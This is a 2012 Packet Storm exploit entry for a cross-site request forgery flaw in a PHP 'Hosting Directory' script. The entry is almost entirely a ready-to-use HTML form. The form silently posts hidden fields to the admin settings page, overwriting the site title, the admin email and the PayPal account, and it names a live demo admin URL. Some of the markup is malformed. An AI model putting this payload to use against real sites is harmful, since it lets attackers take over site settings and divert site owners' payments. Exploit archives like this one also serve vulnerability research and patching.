Hosting Directory Cross Site Request Forgery

2012-04-05T00:00:00
ID PACKETSTORM:111562
Type packetstorm
Reporter Jonturk75
Modified 2012-04-05T00:00:00

Description

                                        
                                            `# Exploit Title: Hosting Directory CSRF  
# Author: Jonturk75  
# Vendor or Software Link: http://www.scripts.com/viewscript/hosting-directory-script/27433/  
# Category:: webapps  
# Demo : http://www.e-soft24.com/scripts/hosting-directory/admin  
# Greetz: Inj3ct0r Exploit DataBase 1337day.com  
  
  
<form method="post" action="settings.php">  
<input name="site_title" size="40" value="Hosting Directory" type="hidden">  
<input name="base" size="40" value="http://www.e-soft24.com/scripts/hosting-directory" type="hidden">  
<input name="admin_mail" size="40" value="mail@mail.com" type="hidden">  
<input name="paypal" size="40" value="yourpaypalaccoun@paypal.com" type="hidden">  
<hiddenarea rows="3" cols="30" type="hidden" name="meta_d">Our web host directory is growing daily with links to hot hosting providers. Add your own hosting website to have your customers rate it to generate more traffic for your business.</hiddenarea>  
<input name="meta_k" size="40" value="web, host, directory, hosting, server" type="hidden">  
<select name="admin_approved" size="1"><option value="yes" selected="">yes</option>  
<option value="no">no</option></select><  
<select name="style_color" size="1"><option value="red" selected>red</option>  
<option value="blue">blue</option>  
<option value="chrome">chrome</option>  
<option value="purple">purple</option>  
<option value="orange">orange</option>  
<option value="green" selected="selected">green</option></select>  
<input name="category" size="5" value="10" type="hidden">  
<input name="popular" size="5" value="10" type="hidden">  
<input name="new" size="5" value="10" type="hidden">  
<input name="search" size="5" value="10" type="hidden">  
<input name="submit" value="Update" type="submit">  
</form>  
  
  
`